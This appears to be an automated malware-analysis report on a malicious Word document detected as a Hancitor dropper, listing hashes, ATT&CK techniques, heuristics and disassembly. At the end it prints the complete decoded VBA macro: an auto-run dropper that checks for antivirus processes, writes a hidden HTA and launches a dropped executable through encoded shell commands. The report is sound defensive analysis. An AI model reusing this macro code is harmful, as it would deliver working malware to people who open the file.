Office (OLE) malware analysis — malicious · dfeb8f1277813ac5

MALICIOUS

Office (OLE)

259.0 KB Created: 2018-10-10 13:54:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: b31b959c7d97b55bd1d49a44ff039dbf SHA-1: 329cf2c9c4b58304c2ac289a4dcba2f640923792 SHA-256: dfeb8f1277813ac525b258113bff3dd5ab28eb0902ad3123352c2b36d44da07c

700 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1140 Deobfuscate or Obfuscate Malicious Code T1204.002 Malicious File

The sample contains VBA macros that trigger on document open. These macros utilize Base64 decoding and the Shell() function to execute a command. The decoded command is 'cmd.exe /c ping localhost -n 100 &&', which is a common stager for downloading and executing further payloads. The presence of WMI process creation and references to LoadLibrary and VirtualProtect APIs further indicate malicious intent, likely to download and run a second-stage executable.

Heuristics 19

Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT

OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
ClamAV: Doc.Dropper.Hancitor-6774061-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Hancitor-6774061-0

XOR-encoded strings (key 0x78) critical SC_XOR_ENCODED

Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0x78: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'

Disassembly

x86 disassembly · validity: uncertain (0.584) — 0/5 branch targets land on an instruction boundary (0% coherence)

00026273  3417              xor al, 0x17
00026275  191c34            sbb dword ptr [esp + esi], ebx
00026278  111a              adc dword ptr [edx], ebx
0002627A  0a19              or bl, byte ptr [ecx]
0002627C  0a01              or al, byte ptr [ecx]
0002627E  3978fb            cmp dword ptr [eax - 5], edi
00026281  b87bf1fd60        mov eax, 0x60fdf17b
00026286  87878720f3fd      xchg dword ptr [edi - 0x20cdf79], eax
0002628C  60                pushal
0002628D  87878728f335      xchg dword ptr [edi + 0x35f32887], eax
00026293  8829              mov byte ptr [ecx], ch
00026295  872da0f1fd4c      xchg dword ptr [0x4cfdf1a0], ebp
0002629B  878787289078      xchg dword ptr [edi + 0x78902887], eax
000262A1  7878              js 0x2631b
000262A3  7820              js 0x262c5
000262A5  93                xchg ebx, eax
000262A6  752e              jne 0x262d6
000262A8  110a              adc dword ptr [edx], ecx
000262AA  0c0d              or al, 0xd
000262AC  191439            sbb dword ptr [ecx + edi], edx
000262AF  1414              adc al, 0x14
000262B1  17                pop ss
000262B2  1b78fb            sbb edi, dword ptr [eax - 5]
000262B5  b87bf1fd40        mov eax, 0x40fdf17b
000262BA  87878720f3ed      xchg dword ptr [edi - 0x120cdf79], eax
000262C0  40                inc eax
000262C1  8787872af33d      xchg dword ptr [edi + 0x3df32a87], eax
000262C7  8828              mov byte ptr [eax], ch
000262C9  872da0f13dc0      xchg dword ptr [0xc03df1a0], ebp
000262CF  28                .byte 0x28
000262D0  90                nop
000262D1  7878              js 0x2634b

Raw OLE macro native-memory callback shellcode loader critical OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER

Raw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad.
VBA macros detected medium 8 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Matched line in script
```
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
```
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER

VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
Matched line in script
```
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text)

GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
Open Environ("Temp") & "\1.hta" For Output As #1
```
Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 265,216 bytes but its declared streams total only 154,673 bytes — 110,543 bytes (42%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT

Reference to VirtualProtect API
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6528 bytes
SHA-256: `76c4454e6102794004230c7df6890f3b545e67e7a5187a50a8250fc22dcc5b20`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next Call kfs Call sdfsdf Set D = New DataObject D.SetText " " D.PutInClipboard Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveLeft Unit:=wdCharacter, Count:=13 Dim t As Date t = Now Do DoEvents Loop Until Now >= DateAdd("s", 3, t) Call Module1.killo End Sub Private Sub Document_Close() Call closee End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Attribute VB_Name = "Module1" Sub killo() ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument Application.Quit End Sub Attribute VB_Name = "Module2" Sub closee() Dim t As Date t = Now Do DoEvents Loop Until Now >= DateAdd("s", 15, t) Dim kjfaa kjfaa = "bd" & "agent.exe" Dim yrtfdsad, vcxvxczcv Dim mbbmbdf Set vcxvxczcv = GetObject("wi" & "nmgmts:") Dim gfdfsfsfs Set yrtfdsad = vcxvxczcv.ExecQuery("SELECT * FROM Win32_Process") Dim hdffsdfs For Each x In yrtfdsad Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text) Dim pipec As Boolean: pipec = True If x.Name = kjfaa Then Dim lhjxvcvx lhjxvcvx = StrConv(DecodeBase64(UserForm3.TextBox1.Text), vbUnicode) Open Environ("Temp") & "\1.hta" For Output As #1 Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode) Print #1, lhjxvcvx Close #1 ChDir Environ("Temp") wsh.Run Environ("Temp") & "\1.hta", 0, False Exit Sub End If If x.Name = "PSUAMain.exe" Then Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide Exit Sub End If If x.Name = "n360.exe" Then Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide Exit Sub End If Next Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Attribute VB_Name = "Module3" Sub kfs() Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveRight Unit:=wdCharacter, Count:=24 Selection.TypeBackspace Selection.Copy End Sub Attribute VB_Name = "Module4" Sub sdfsdf() ChDir Environ("Temp") Selection.TypeBackspace Call kklk Call fadf End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Sub fadf() kk = ".p" & "if" Dim FSO As Object Set FSO = CreateObject("scripting.filesystemobject") FSO.copyfile Source:="5C" & kk, Destination:="6" & ".pif" End Sub Attribute VB_Name = "UserForm3" Attribute VB_Base = "0{98724B47-B6B1-4ACE-A61D-68A71704E485}{D4E86E16-6812-4454-A79B-F0F8445F873E}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{6E5DDC7C-02D6-42D7-8C2B-464A67B87231}{5A3B6867-AEB6-42C7-947F-2780DE25BC20}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Module5" Sub kklk() ChDir Environ("Temp") Dim kk, lll, jgf, tyretw, gdfsfsa jgf = "x" & "e" kk = ".p" & "if" lll = "6" & ".e" Dim FSO As Object Set FSO = CreateObject("scripting.filesystemobject") FSO.copyfile Source:="5C" & kk, Destination:=lll & jgf End Sub Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{A8BE1721-343B-43FD-8170-3048F0850358}{F01B3F9F-3293-4142-91F9-90FF9B3DB8AA}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm4" Attribute VB_Base = "0{9273F296-A00B-40A9-BA2D-E27C576ACCC5}{EEC3516B-03C1-4094-89AD-1FE03D9AE4C2}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.